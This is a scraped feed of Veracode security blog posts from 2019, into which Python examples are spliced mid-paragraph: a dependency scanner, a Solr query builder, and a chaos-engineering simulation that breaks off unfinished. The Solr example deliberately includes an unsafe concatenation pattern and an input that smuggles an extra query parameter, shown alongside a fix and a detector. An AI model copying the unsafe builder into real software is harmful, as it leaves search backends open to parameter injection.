updated does not need to be scanned every week, but that Internet-facing/PII app may require a scan for every commit.</p> <p><strong>Average time to resolve: </strong>Many application testing solutions focus on scan activity rather than addressing results. 
While apps need to be scanned, fixing those security findings in a timely manner is a better mechanism for evaluating your application security program. Time to resolve provides visibility into how many days it takes for a finding to be closed after it is first discovered, helping security teams better understand where there may be bottlenecks in the development and security process.</p> <p><strong>Flaw prevalence</strong>: This metric spotlights how common a risk is within a particular industry or business. It helps an organization prioritize threats such as SQL injection, Cross-Site Scripting (XSS), cryptographic issues, and CRLF injection based on real-world impact.</p> <h4><strong>Learn more about flaw rate</strong></h4> <p>For detailed instructions on measuring flaw rate, please see <a href="">this article</a> in the Veracode Community.</p> Tue, 27 Aug 2019 11:53:39 -0400 (anielsen) ver42926 Veracode Now Available on the Digital Marketplace G-Cloud UK <img src="/sites/default/files/styles/resize_960/public/gcloud-blog-background.jpg?itok=Ca9ZxiQA" width="960" height="480" alt="G Cloud Blog Featured Image" title="G Cloud Blog " typeof="foaf:Image" /><p>There is a deepening awareness that cyberthreats can never be eliminated completely and that digital resilience is an absolute necessity, and this is true for both private and public sector organizations and agencies. With this understanding, the UK Government created its <a href="">G-Cloud Framework</a>, which has transformed the way that public sector organizations can purchase information and communications technology in order to build more secure digital foundations. The program allows public bodies to buy commodity-based, pay-as-you-go cloud services through government-approved, short-term contracts via the <a href="">Digital Marketplace</a>. This procurement process supports the UK Government's <a href="">Cloud First</a> policy, as well as its desire to achieve a "Cloud Native" 
digital architecture.</p> <p>Strengthening the security posture of your applications is critical to strengthening the security posture of your organization, and the <a href="//">Veracode Platform</a> was created as a cloud-based application security solution because of the multitude of advantages it offers our customers. Not only are you able to avoid the expenses associated with purchasing hardware, procuring software, managing deployment, and maintaining systems, you are also able to implement immediately, which means seeing results and value on day one. We've now made it even simpler for organizations within the UK to secure their application portfolio: the Veracode Platform and <a href="//">services</a> are now available for purchase on the <a href="//">Digital Marketplace</a>.</p> <p><strong>Revolution not Evolution: How the UK Government Created a Cloud First Initiative</strong></p> <p>In 2010, the UK Government began a revolution that has influenced the way in which nations around the world conduct business and structure cybersecurity programs within their own government bodies and organizations. The creation of the <a href="">Government Digital Service</a> (GDS), a consumer-facing portal and link for businesses that simplifies interacting with the government, led to the adoption of a <a href="">Cloud First policy</a> for all government technology purchases.</p> <p>The GDS team was created to fundamentally rethink how government works in the modern era, with the aim of establishing a digital center for the UK government that would bring talent in-house, rather than relying on vendor expertise to make changes to government web applications and properties. 
The ultimate goal was to fix and enhance the way that people interact with the government, embed skills and capability across the government so that it could work in a new way, and open up data and APIs so other people could build on government-developed services.</p> <p>The re-architecting of the government website began with a whiteboard and a heavy focus on user needs. The small team worked together to build a hub that would evoke a response, understanding that leading with imagery was really powerful, and iterated, changed, and improved as they homed in on the users' needs. At that time, no other government technology had run in an agile fashion.</p> <p>And then the GDS team took it one step further by making all of its <a href="">GitHub repositories open</a>, because they considered it to be the people's code, they wanted the people to help make their code better, and they knew it would make recruitment simpler if they could more easily show potential candidates what was under the hood. It allowed different agencies within the government to work together more openly, which helped to reduce the risks associated with the open source code everyone was using.</p> <p><strong>The Cloud First Policy</strong></p> <p>This new approach to development also called for new processes and policies for acquiring software and working with technology vendors. In 2013, the UK government adopted a <a href="">Cloud First</a>, or Cloud Native, policy for all technology decisions. By operating in a Cloud Native framework, the government is able to adapt how it organizes its work to take advantage of what's available in the market and any emerging technologies. 
This new policy made it mandatory to consider cloud solutions before alternatives, as well as making it necessary to demonstrate why non-cloud technologies would provide better value for the money if opting for an on-premises solution.</p> <p>Further, the policy states that the government must also consider public cloud first, meaning <a href="//">SaaS models</a> (particularly for enterprise IT and back office functions) as well as Infrastructure as a Service and Platform as a Service. The GDS team understands that without adapting and adopting technologies and focusing on core outcomes and principles, it won't be able to meet the expectations of its users, and it won't be prepared for the changes likely to arise as it manages growing volumes of data and a proliferation of devices and sensors.</p> <p>To truly become cloud native, the GDS transformed how it monitors and manages distributed systems to include diverse applications. It continues to deepen the conversations with vendors about the standards that will help them manage these types of technology shifts. Most of all, it continues to ensure it always chooses cloud providers that fit the needs at hand, rather than basing choices on recommendations.</p> <p><em>To learn more about Veracode's offerings on the Digital Marketplace G-Cloud UK, including our application security platform and services, </em><a href="//"><em>click here</em></a><em>.</em></p> Thu, 22 Aug 2019 07:15:00 -0400 (lpaine) ver42846 Introducing the New Veracode Software Composition Analysis <img src="/sites/default/files/styles/resize_960/public/sca-launch-product-blog.png?itok=DxZShG_l" width="960" height="480" typeof="foaf:Image" /><p>Open source technology empowers developers to make software better, faster, and more efficiently as they push the envelope and delight users with desired features and functionality. This is a trend that is unlikely to fade, at least not in the foreseeable future, 
and has further fueled our passion for securing the world's software. This is also why Veracode acquired SourceClear: we had a vision for the impact that integrating our software composition analysis (SCA) technologies would have on our customers' ability to develop bold, revolutionary software using open source code without risking their security posture.</p> <p>Today, our customers have access to an industry-leading, scalable SCA solution that provides unparalleled support for SCA in DevSecOps environments through the cloud-based Veracode Application Security Platform. Veracode SCA offers a unique vulnerable method detection technology that increases the actionability of SCA scan results, as well as the ability to receive continuous alerts on new or updated vulnerabilities without rescanning an application.</p> <p>Further, our solution relies on a proprietary library and vulnerability database, built using true machine learning and data mining, which has the ability to identify vulnerabilities not available in the National Vulnerability Database (NVD). In addition to CVEs, the database now also includes Reserved CVEs and No-CVEs detected with our data mining and machine learning models. 
These results are verified by our expert data research team for all supported languages.</p> <p><strong>Software Composition Analysis for DevSecOps Environments</strong></p> <p>Veracode SCA offers remediation guidance, SaaS-based scalability, and integration with Continuous Integration tools to provide users with visibility into all direct and indirect open source libraries in use, known and unknown vulnerabilities in those libraries, and how they impact applications, without slowing down development velocity.&nbsp;</p> <p>Additionally, it is the only solution in the market that offers two ways to start an SCA scan, each giving insight into open source vulnerabilities, library versions, and licenses:</p> <p><strong>Scan via Application Binary Upload </strong></p> <p>Through the traditional application upload process, you're able to upload your applications or binaries to the Veracode Application Security Platform so that you can run scans via the UI or an API.</p> <p>SCA scans continue to run alongside Veracode Static Analysis. During the pre-scan evaluation for static scanning, Veracode executes the SCA scan to review the application's composition, and the results are delivered while the static scan continues. Bill of materials, scores, policy definition, and open source license detection remain available for those application upload scans.</p> <p>Veracode has also added language support for applications developed in Golang, Ruby, Python, PHP, Scala, Objective-C, and Swift, in addition to the existing support for Java, JavaScript, Node.js, and .NET applications.</p> <p><strong>Agent-Based Scanning</strong></p> <p>Agent-based scanning, integrated within the Veracode Application Security Platform, enables you to scan your source code repositories directly, either manually from the command line or in a Continuous Integration pipeline. 
Agent-based scanning now detects more open source license types in open source libraries. The library and vulnerability database has grown to include more newly detected vulnerabilities, and project scans can now be linked with application profiles for policy compliance, reporting, and PDF reports. Customers using Veracode SCA agent-based scanning can conduct:</p> <ul> <li><strong>Vulnerable Method Detection:</strong> Pinpoint the line of code so developers can determine whether their code calls the vulnerable part of the open source library.&nbsp;</li> <li><strong>Auto Pull Requests:</strong> Veracode SCA identifies vulnerabilities and makes recommendations for using a safer version of the library. This feature automatically generates pull requests ready to be merged with your code in GitHub, GitHub Enterprise, or GitLab. It provides the fix for you.</li> <li><strong>Container Scanning:</strong> Scan Docker containers and container images for open source vulnerabilities in Linux distributions and base libraries.&nbsp;</li> </ul> <p>Users have the flexibility to use both scanning types for the same application. Agent-based scanning can be used during development, and a traditional binary upload scan can be conducted before the application is put into production. Scan results continue to be assessed against the chosen policy and prompt users to take action based on the results. These actions can be automated with integration to Jenkins (or another Continuous Integration tool) to either break the build because of a failed policy scan, or to simply report the failed policy.</p> <p>It's no exaggeration to say that every company is becoming a software company, and the adoption of open source is on the rise. Having clear visibility into the open source components within your application portfolio reduces the risk of breach through vulnerabilities. 
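As an added example of the kind of checks the scan types above perform, and not Veracode SCA's own code or database, the Python below does a toy version of each step: it reads a constructed requirements file, matches pinned versions against constructed advisory records (the `ADV-PLACEHOLDER` ids stand in for real identifiers), resolves import aliases to decide whether the application actually calls the flagged method, and applies a break-the-build policy. The manifest, source file, library names and advisories are all constructed for this illustration.

```python
"""
Added example, not Veracode SCA and not its database: a toy version of the
agent-style checks described in the post. Advisory ids are placeholders,
the libraries are invented, and the manifest and source are constructed.
"""
import ast

# Constructed advisories: affected range is [introduced, fixed), and `method`
# is the library function whose use makes the flaw reachable.
ADVISORIES = [
    {"id": "ADV-PLACEHOLDER-1", "library": "fastxml", "severity": "high",
     "introduced": (1, 0, 0), "fixed": (1, 4, 2), "method": "fastxml.parse_untrusted"},
    {"id": "ADV-PLACEHOLDER-2", "library": "tinyjwt", "severity": "medium",
     "introduced": (0, 1, 0), "fixed": (0, 9, 0), "method": "tinyjwt.decode"},
]

# Constructed inputs standing in for a repository's manifest and application code.
SAMPLE_REQUIREMENTS = """
fastxml==1.3.0      # inside the vulnerable range
tinyjwt==0.9.1      # already at a fixed version
requests==2.31.0
"""
SAMPLE_SOURCE = """
import fastxml
from tinyjwt import decode as verify_token

def handle(body, token):
    claims = verify_token(token)
    return fastxml.parse_untrusted(body), claims
"""


def parse_version(text):
    return tuple(int(part) for part in text.strip().split("."))


def parse_requirements(text):
    """Minimal requirements.txt reader: 'name==version' lines, comments allowed."""
    deps = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, sep, version = line.partition("==")
        if sep:
            deps[name.strip().lower()] = parse_version(version)
    return deps


def find_vulnerable(deps):
    """Bill-of-materials match: advisories whose range contains the pinned version."""
    return [adv for adv in ADVISORIES
            if adv["library"] in deps
            and adv["introduced"] <= deps[adv["library"]] < adv["fixed"]]


def called_methods(source):
    """Fully qualified names of functions the source calls, with import aliases resolved.

    Toy counterpart of vulnerable method detection: direct calls only, no data
    flow, so a call made indirectly through another library is not seen.
    """
    tree = ast.parse(source)
    alias = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for name in node.names:
                alias[name.asname or name.name] = name.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for name in node.names:
                alias[name.asname or name.name] = f"{node.module}.{name.name}"
    calls = set()
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        parts, target = [], node.func
        while isinstance(target, ast.Attribute):
            parts.append(target.attr)
            target = target.value
        if isinstance(target, ast.Name):
            parts.append(alias.get(target.id, target.id))
            calls.add(".".join(reversed(parts)))
    return calls


def evaluate_policy(requirements, source, fail_on=("high",)):
    """Return (build_ok, findings). The build fails on a reachable finding at a fail_on severity."""
    deps = parse_requirements(requirements)
    calls = called_methods(source)
    findings = []
    for adv in find_vulnerable(deps):
        findings.append({
            "id": adv["id"], "library": adv["library"], "severity": adv["severity"],
            "installed": ".".join(map(str, deps[adv["library"]])),
            "fix_version": ".".join(map(str, adv["fixed"])),
            "reachable": adv["method"] in calls,
        })
    build_ok = not any(f["severity"] in fail_on and f["reachable"] for f in findings)
    return build_ok, findings


if __name__ == "__main__":
    ok, report = evaluate_policy(SAMPLE_REQUIREMENTS, SAMPLE_SOURCE)
    print("build ok:", ok)
    for finding in report:
        print(finding)
```

The policy here breaks the build only when a high-severity finding is also reachable and reports everything else as informational; that is a design choice to cut noise, not a rule. The reachability check is purely syntactic (direct calls, resolved through import aliases), which is exactly the gap a real vulnerable-method analysis has to close with call-graph or data-flow information.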
The new Veracode Software Composition Analysis solution helps our customers confidently use open source components without introducing unnecessary risk.&nbsp;</p> <p>To learn more about Veracode Software Composition Analysis, download the technical whitepaper, "<a href=""><em>Accelerating Software Development with Secure Open Source Software</em></a>."</p> Mon, 19 Aug 2019 13:50:33 -0400 (jperez) ver42831 Key Ways to Make the Case for AppSec Budget <img src="/sites/default/files/styles/resize_960/public/AppSec_slice_security_budget.png?itok=jPLEb5pc" width="960" height="480" typeof="foaf:Image" /><p>Security departments are juggling a multitude of security initiatives, and each is competing for a slice of one budget. How do you make the case that AppSec deserves a slice of that budget pie, or a bigger slice, or even that the pie should be bigger? Here are a few key ways:</p> <h4><strong>Find a compelling event</strong></h4> <p>The most obvious compelling event, of course, is a breach, but there are other events that will compel executives to budget for application security. For instance, regulations could be a compelling event: if you have to comply with a security regulation (PCI, NY DFS cybersecurity regulations, etc.) or pay a fine, that's an easy budget win. In addition, customers asking about the security of software could be a compelling event. IT buyers are increasingly asking about the security of software before purchasing. We recently conducted <a href="">a survey of IT buyers with IDG</a>, and 96 percent of respondents reported that they are more likely to consider doing business with a vendor or partner whose software has been independently verified as "secure." 
Sales losing a deal because they couldn't respond to a security audit would certainly be considered a compelling event.</p> <h4><strong>Look to the future</strong></h4> <p>A clear road map and plan for your AppSec program not only gives you more credibility, but also helps to "warm up" your investors to what you're planning on doing in future years. Show the efficiencies and risk reduction your program will deliver in the future to highlight how upfront investment will lead to future results. For instance, an investment in developer training will make developers more self-sufficient and lessen the burden on security teams.</p> <h4><strong>Benchmark </strong></h4> <p>It can be powerful to illustrate where your organization's security program sits relative to other organizations and your peers. If you're lagging, it's a clear indication that further investment is needed. If you're leading, you can use that fact to prove your progress and make the case for more ambitious projects.</p> <p>Veracode's <a href="//"><em>State of Software Security</em></a> is a good benchmarking resource, as is the <a href="">OpenSAMM</a> framework. The <em>State of Software Security</em> report includes comparisons by industry, so you can point to the application security progress made by others within your own industry. In addition, OWASP's Application Security Verification Standard (<a href="">ASVS</a>) can help organizations to classify applications into three different levels from low to high assurance. This helps firms to allocate security resources based on the software's business importance or breach risk.</p> <h4><strong>Know your audience</strong></h4> <p>Speak the language of executives when making the case for more budget. For instance, telling the CFO, "we've reduced the number of SQL injections" won't resonate. 
Rather than the number of SQL injections, talk about how the program will reduce the number of breaches by X percent, or how it will reduce the cost to fix vulnerabilities by X percent. Be mindful of your audience and frame your budgeting conversation accordingly.</p> <h4><strong>Be visible and credible</strong></h4> <p>The more credible you are, the better your chances of getting the budget you're asking for. Clearly understand what you're going to do with the money, and how you're going to justify that spend. Prove that you understand how your organization works and that you will use the money effectively. Finally, tie application security to business priorities and initiatives, and be able to show a clear roadmap for your program.</p> <p>In addition, be visible. It's important to promote the success of your program. Present on the progress you're making, run awareness sessions, or have visible dashboards.</p> <h4><strong>Break down your budget (must, should, could)</strong></h4> <p>You'll have a range of priorities and things that you could be spending money on in your AppSec program. Give your budget stakeholder options. Start with what you must do, for instance, what you need to achieve for regulatory compliance. And then give them some wiggle room in the middle on projects that they <em>should</em> or <em>could</em> do. 
If you go in with a number in mind and don't get it, be ready to slice and dice your budget request.</p> <h4><strong>Learn more</strong></h4> <p>Get more details on these strategies and additional tips and advice on making the case for AppSec budget in our new guide, <a href=""><em>Building a Business Case for Expanding Your AppSec Program</em></a>.</p> Thu, 15 Aug 2019 17:07:13 -0400 (sciccone) ver42811 As Cyberattacks Increase, So Does the Price of Cybersecurity Professionals <img src="/sites/default/files/styles/resize_960/public/shutterstock_680761051_tiny.png?itok=9Xyv8Z-e" width="960" height="480" typeof="foaf:Image" /><p>Cyberattacks are on the rise, and companies are noticing. Everyone is in a scramble to avoid being the next corporation sweeping news headlines with the words "data breach" following. As a result, the demand for cybersecurity experts is skyrocketing, but there are a couple of problems. Not only are there not enough cybersecurity experts to fill those roles, but the cybersecurity experts that <em>are</em> out there are demanding a premium for their talents.</p> <p>A <a href=""><strong>recent Bloomberg article</strong></a> stated that in 2012, an enticing rate for a chief information security officer at a large company was $650,000. Fast forward to 2019, and the same role at the same company is going for $2.5 million. On top of that, the article points to data that shows there were more than 300,000 unfilled cybersecurity jobs over a 12-month period in the United States in 2017-2018. When looking to the future, <a href=""><strong>Cybersecurity Ventures predicts</strong></a> that the number of unfilled positions will grow to about 3.5 million jobs.</p> <p>So, the problem itself is two-pronged. Companies are recognizing that they need to address cybersecurity in some way, shape, or form, and are looking to bring in experts to help them out, 
but those experts come at a very high cost.</p> <p><strong>Alternatives to the salary game</strong></p> <p><em>Security champions</em></p> <p>Hiring additional security professionals does not have to be the starting point for your company to take the leap into more secure software. One practical way to embed security into your organization, and get more from your existing security team, is to look for, and create, security champions on your development teams. Step one is finding a security-minded individual on your development team, and then giving them extra training, responsibilities, and perks to incentivize them to be that security liaison. Developers will be much more inclined to take security advice from someone who's already familiar with their lingo and processes.</p> <p>Ultimately, with a security champion, an organization can make up for a lack of security coverage or skills by empowering a member of the development team to act as a force multiplier who can pass on security best practices, answer questions, and raise security awareness.</p> <p><em>For more information on security champions, check out </em><a href="//"><strong><em>this Veracode guide</em></strong></a><em>.</em></p> <p><em>Outside partners</em></p> <p>As organizations struggle to find the right people to step in and oversee their programs, another effective way to ensure you have your bases covered is by bringing in an outside partner. Having a partner that offers hands-on support, coaching for developers, and AppSec expertise can make a world of difference. 
We aren't suggesting you replace your internal team with outside consultants; rather, that you free your team to focus on managing risk by taking these tasks off of their plates:</p> <ul> <li>Addressing the blocking and tackling of onboarding</li> <li>Application security program management</li> <li>Reporting</li> <li>Identifying and addressing barriers to success</li> <li>Working with development teams to ensure they're finding and remediating vulnerabilities</li> </ul> <p><em>Learn more about the benefits of bringing in an outside partner </em><a href="//"><strong><em>in this blog</em></strong></a><em>. </em></p> <p><em>Automation</em></p> <p>While you try to find the balance between keeping your headcount low and covering all of your bases from a security standpoint, a fantastic way to tie your approach together is to use automated security solutions. You can remove the need for human intervention as much as possible, continue to enable your developers to test for flaws early and often, and integrate a solution that works in tandem with your current environment. Having security champions, automated solutions that are easy to work with, and a partner who can help your developers out when they run into roadblocks are all effective ways to reduce your risk without breaking the bank.</p> <p>Want to find out how Veracode can help you check off all of these boxes and more? Request a personalized <a href=""><strong>demo of our platform</strong></a> today.</p> Wed, 14 Aug 2019 13:00:00 -0400 (vlattell) ver42746 New Research: Apache Solr Parameter Injection <img src="/sites/default/files/styles/resize_960/public/default_images/default_fullsize_image_1600x800_Generic_2.png?itok=gTO2COUK" width="960" height="378" alt="" typeof="foaf:Image" /><p>Apache Solr is an open source enterprise search platform, written in Java, from the Apache Lucene project. 
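Before going further, here is an added example that is not from this post, from Michael Stepankin's whitepaper, or from the Solr project. It puts the fragile pattern behind the parameter-injection class the post goes on to describe, a Solr query URL assembled by string concatenation, next to a builder that fixes the parameter names, range-checks numbers and encodes the search term, and adds a check that flags outbound requests whose parameters are repeated or outside an allowlist. The host, collection, and the `widget&rows=1000` input are constructed for the illustration.

```python
"""
Added example, not code from the post, the whitepaper, or Solr itself:
the concatenation pattern that lets untrusted text add Solr request
parameters, a hardened builder, and an outbound-request check.
The Solr host and collection below are hypothetical.
"""
from urllib.parse import urlencode, urlsplit, parse_qs

SOLR_SELECT = "http://solr.internal.example:8983/solr/products/select"  # hypothetical
ALLOWED_PARAMS = {"q", "rows", "start", "fl", "wt"}  # what this app is meant to send
MAX_ROWS = 100

# Characters with special meaning in Lucene/Solr query syntax. This is the set
# SolrJ's ClientUtils.escapeQueryChars escapes (plus whitespace, handled below).
_SPECIAL = set('\\+-!():^[]"{}~*?|&;/')


def escape_query_chars(text):
    """Backslash-escape query syntax characters and whitespace in a search term."""
    out = []
    for ch in text:
        if ch in _SPECIAL or ch.isspace():
            out.append("\\")
        out.append(ch)
    return "".join(out)


def build_url_unsafe(term):
    """Fragile pattern: untrusted text pasted straight into the query string.

    Anything after an '&' in `term` becomes a separate Solr request parameter,
    so the caller no longer controls which parameters the server receives.
    """
    return SOLR_SELECT + "?q=" + term + "&rows=10"


def build_url_safe(term, rows=10):
    """Hardened pattern: fixed parameter names, range-checked numbers, encoded values."""
    rows = int(rows)
    if not 1 <= rows <= MAX_ROWS:
        raise ValueError("rows out of range")
    params = {"q": escape_query_chars(term), "rows": rows, "fl": "id,name", "wt": "json"}
    return SOLR_SELECT + "?" + urlencode(params)


def request_params(url):
    """Decode the query string as the server would see it: name -> list of values."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


def suspicious_params(url):
    """Names of parameters outside the allowlist or sent more than once.

    Suitable as a check in an egress proxy in front of Solr, or as a rule
    over access logs, to spot requests the application did not intend.
    """
    params = request_params(url)
    return {name for name, values in params.items()
            if name not in ALLOWED_PARAMS or len(values) > 1}


if __name__ == "__main__":
    user_input = "widget&rows=1000"  # constructed input carrying an '&'
    print(build_url_unsafe(user_input))
    print(build_url_safe(user_input))
    print("suspicious:", suspicious_params(build_url_unsafe(user_input)))
```

Run it and the unsafe URL carries two `rows` values, which is exactly the signal `suspicious_params` keys on, while the safe URL keeps the whole input inside `q` as a literal term. The escaping is right when the input is meant as plain search text; an application that deliberately accepts query syntax from users needs a parser with its own limits instead.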
Its major features include full-text search, hit highlighting, faceted search, dynamic clustering, and document parsing. You treat it like a database: you run the server, create a collection, and send different types of data to it (such as text, XML documents, PDF documents, etc.). Solr automatically indexes this data and provides a fast, rich REST API interface to search it. The only protocol for talking to the server is HTTP, and yes, it's accessible without authentication by default, which makes it a perfect victim for keen hackers.</p> <p>In a new research paper, Veracode Security Researcher <a href="//">Michael Stepankin</a> sheds light on this new type of vulnerability for web applications, Solr parameter injection, and explains how cyberattackers can achieve remote code execution through it. Whether the Solr instance is Internet-facing, behind a reverse proxy, or used only by internal web applications, the ability to modify Solr search parameters is a significant security risk. Further, in cases where only a web application that uses Solr is accessible, by exploiting 'Solr (local) Parameters Injection,' it is possible to at least modify or view all the data within the Solr cluster, or even exploit known vulnerabilities to achieve remote code execution.</p> <p>Read the in-depth, technical whitepaper, "<em>Apache Solr Injection</em>," on <a href="">GitHub</a>.</p> Wed, 14 Aug 2019 08:30:00 -0400 (lpaine) ver42706 Live From Black Hat USA: Making Big Things Better the Dead Cow Way <img src="/sites/default/files/styles/resize_960/public/Cult_Dead_Cow_BlackHat.png?itok=CVjAFchZ" width="960" height="480" typeof="foaf:Image" /><p>When Reuters' investigative reporter Joseph Menn confirmed that presidential candidate Beto O'Rourke was an early member of The Cult of the Dead Cow (cDc), it seemed as though folks had two viewpoints on it. 
They either had more respect for him because they understood what cDc was trying to accomplish, or they were relatively horrified because "hackers are bad." It's easy to fear what we don't understand, and what is often cast in a bad light.</p> <p>In InfoSec, we know and understand that hackers are not inherently bad. Many of them are hacktivists looking to make positive change in the world. During the Black Hat panel discussion, "Making Big Things Better the Dead Cow Way," Menn talked about how O'Rourke was 14 or 15 years old when he joined the cDc and left before the organization grew in notoriety, and that he interviewed a neo-Nazi in Texas and proceeded to let him hang himself with his own words. Even at that young age, he was all about diversity and engagement, especially within the cDc.</p> <p>Mudge Zatko, a prominent member of L0pht and the cDc, who went on to be a program manager at DARPA, shared what he thought stood out most about O'Rourke, saying, "You can form groups online, but when you get together and meet the person, are they who you thought? You met [Beto] and he was a very friendly guy."</p> <p>This story matters because in order to make change, you have to understand where your power and influence lie to have the best results. For O'Rourke, that looks like running for president. For the cDc, it was acknowledging that hackers have power and influence. With the understanding that computers and encryption could be leveraged to help human rights efforts, the group made a more public move toward hacktivism.</p> <p>"What can you do to make the world a better place? How do we leverage this power? Use that to go through the media, and hopefully through some sort of technology, but especially through our connections to the media and use the influence of our long history," 
said Mudge.</p> <p>While Veracode co-founder Christien Rioux, or Dildog, opted to work with the private sector to tackle issues of security at wide scale by creating the technology that would become static binary analysis and Veracode, there are many who opt to take more of a hacktivist approach. As with anything else, there are varying views on what hacktivism is and what it isn't, which parallels debates about what human rights truly encompass.</p> <p>"What is your definition of human rights? Just governmental interaction because of civil liberties, or is it applicable to private organizations?" asks Luke Benfey (aka Deth Veggie). "Some believe it is and some believe it isn't. There are philosophical disagreements about what is ethically valid. Some believe that DDoS or web defacement is not applicable as a legitimate means of protest, and others believe it is a legitimate means of protest. These are things that are still going on, and I don't necessarily think that the kinds of hacktivism have changed radically, so much as scale has changed; the Internet and access to it has spread much more widely around the world."</p> <p>With broader access comes broader awareness and even broader responsibility: once something is seen it can't be unseen. While we certainly see malicious cyberattacks making headlines, a lot of good is being done by the hacktivist community as well. Just look to discussions around coordinated disclosure and the ways in which security researchers are working with private and public organizations to make them, and all of us, 
safer.</p> <p>If you're looking for something to do, and want real proof of the cDc's hacktivist ethos, we were told that if you search the former Yugoslavia website for cDc in the case files pertaining to former Yugoslav president Slobodan Milosevic's trial for war crimes, you'll see that they pop up a lot for their work helping prosecutors.</p> <p>Or you could just watch this video Q&amp;A where Veracode Co-Founder Chris Wysopal (@WeldPond) interviews Menn, Rioux, and Deth Veggie about the cDc and Menn's book, "Cult of the Dead Cow: How the Original Hacking Supergroup Might Just Save the World," at this year's Black Hat.</p> <p><iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="" width="560"></iframe></p> Fri, 09 Aug 2019 09:36:36 -0400 (lpaine) ver42701 Live From Black Hat USA: The Inevitable Marriage of DevOps & Security <img src="/sites/default/files/styles/resize_960/public/shutterstock_1062446840.png?itok=QYbkkkiY" width="960" height="480" typeof="foaf:Image" /><p>During her briefing with Kelly Shortridge, vice president of product strategy at Capsule8, Dr. Nicole Forsgren, research and strategy at Google, did a beautiful job of adding imagery to the story she told of the attendee reactions during the now-famous talk Paul Hammond and John Allspaw <a href="">gave at Velocity in 2009</a>. If you're not familiar, the title of said talk was, "10 Deploys Per Day: Dev &amp; Ops Cooperation at Flickr."</p> <p>Forsgren recalled that, "The room was split. At the end of this process, large pieces of code would be deployed and, basically, lit everyone on fire. Half the room was amazed and it was changing the world. Half of the room said they were monsters and how dare they light people on fire 10 times per day." Forsgren concluded that "DevOps has crossed the chasm - the business benefits are too striking. We see most of the industry doing this. 
There is no turning the ship around."</p> <p>Indeed, DevOps has long moved beyond the conceptual and has become a widely adopted practice in software development and delivery. It gave birth to the InfoSec equivalent, DevSecOps, and the concept of "shifting security left." From where I sit within Veracode, I see the ways that many security solutions providers are doing their best to provide developers with the tools they need to embed security into their workflow, yet it's clear that there is still more to be done to get InfoSec professionals on board.</p> <p>"James Wickett has said the ratio of engineers in development, operations, and InfoSec in a typical technology organization is 100:10:1. If we integrate [InfoSec professionals] earlier to have input, the shift left can build a more collaborative culture, contribute to amazing outcomes - like stability, reliability, and resiliency," Forsgren said. "We need to build secure systems, and we will find ways to do this. We know this is super important, and security is the next frontier. Security can contribute to this and join DevOps. Or you can stand aside as DevOps figures this out and carves its own path. I would love to see InfoSec contributing the expertise we just don't have."</p> <p>Forsgren was clearly echoing the sentiment Dino Dai Zovi expressed in his conference keynote. Certainly, the concept of being lit on fire 10 times per day would create a fight-or-flight response, and it is much easier to go to no than to go to yes. Yet, when Forsgren spoke about the benefits of this type of work, she explained that what InfoSec pros would face would be mini-fires with a smaller blast radius. She argues that it is time for InfoSec to say, "no, and…"</p> <h4><strong>The Security of Chaos</strong></h4> <p>It appeared that Shortridge couldn't have agreed more.</p> <p>"The real DevOps will be held accountable for security fixes," said Shortridge. "So what should goals and outcomes become? 
Why should InfoSec and DevOps goals diverge? InfoSec should support innovation in the face of change - not add friction. InfoSec has arguably failed, so 'this is how we've always done it' is invalid. The greatest advances in security are rarely spawned by the security industry."</p> <p>In other words, it's time to start jumping out of the proverbial planes in order to face our fears and start doing things differently in security. Shortridge reminded us that it is inevitable that things will fail and things will be pwned, which is why she is a proponent of adopting chaos engineering. <a href="">Chaos engineering</a> is the discipline of experimenting on a software system in production to provide your organization with a level of confidence in the system's capability to withstand turbulent and unexpected conditions, while still creating adequate quality of service (resiliency) during difficult times.</p> <p>The concept of chaos engineering was created while Greg Orzell was overseeing Netflix's migration to the cloud in 2011. He wanted to address the lack of adequate resilience by creating a tool that would cause breakdowns in their production environment - the one used by Netflix customers. In doing this, the team could move from a development model that assumed no breakdowns to one where they were considered inevitable. This encouraged developers to build resilience into their software from the start. By regularly "killing" random instances of software service, they could test redundant architecture to make sure that a server failure wouldn't noticeably impact the customer experience.</p> <p>"Expect your security controls will fail and prepare accordingly. System architectures must be designed assuming the controls and users will fail," she said. "Users very rarely follow the ideal behaviors. Don't try to avoid incidents. Embrace your ability to respond to them. Ensure that your systems are resilient enough to handle incidents gracefully. 
Pivot toward realistic resilience."</p> <p>If your team can plan for nothing but the chaos factor, then you should understand that there are true benefits to applying chaos resilience, including lower remediation costs, decreased stress levels during real incidents, and less burnout.</p> <p>"Incidents are a problem with known processes, rather than fear and uncertainty. It creates feedback loops to foster understanding of systemic risk. Chaos engineering does this to help us continuously refine security strategy - essentially all the time red teaming. You have the ability to automate the toil, or the manual, repetitive, tactical work that doesn't provide enduring value," she said.</p> <h4><strong>How to Marry DevOps and Security</strong></h4> <p>At the end of the talk, Forsgren offered these tenets for a scalable love between DevOps and Security:</p> <ol> <li>Sit in on early design decisions and demos, but say "No, and…" vs. "No."</li> <li>Provide input on tests so every testing suite has InfoSec's stamp on it.</li> <li>By the last "no" gate in the delivery process, nearly all issues will be fixed.</li> <li>InfoSec should focus on outcomes that are aligned with business goals.</li> <li>Time To Remediate (TTR) should become the preliminary anchor of your security metrics.</li> <li>Security- and performance-related gamedays can't be separate species.</li> <li>Cultivate buy-in together for resilience and chaos engineering.</li> <li>Visibility/observability: collecting system information is essential.</li> <li>Your DevOps colleagues are likely already collecting the data you need - work with them to collect it.</li> <li>Changing culture: change what people do, not what they think.</li> </ol> <p>Forsgren and Shortridge made the case that security cannot force itself into DevOps, it must marry it - and have an equal partnership. 
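To make the two kinds of experiment this talk describes concrete, here is an added, offline simulation; it is constructed for this post and is not code from Capsule8, Netflix, Google, or Veracode. The first experiment kills replicas behind a client that fails over between them, the instance-killing idea from the Netflix story above. The second takes the authorization service away from an API gateway and tests the hypothesis "unauthorized requests are never served" while the control is down, with the gateway's fail-open or fail-closed setting as the variable, which is one way to act on "expect your security controls will fail." The services, the access policy, the principals and the fault injector are all simulated.

```python
"""
Added example, constructed for this post and not code from Capsule8,
Netflix, Google, or Veracode: two small offline chaos experiments with a
steady-state check, a fault injection, a hypothesis check, and a rollback.
"""
import random

# Constructed access-control policy: permitted (principal, action) pairs.
POLICY = {("alice", "read"), ("alice", "write"), ("bob", "read")}


class AuthzService:
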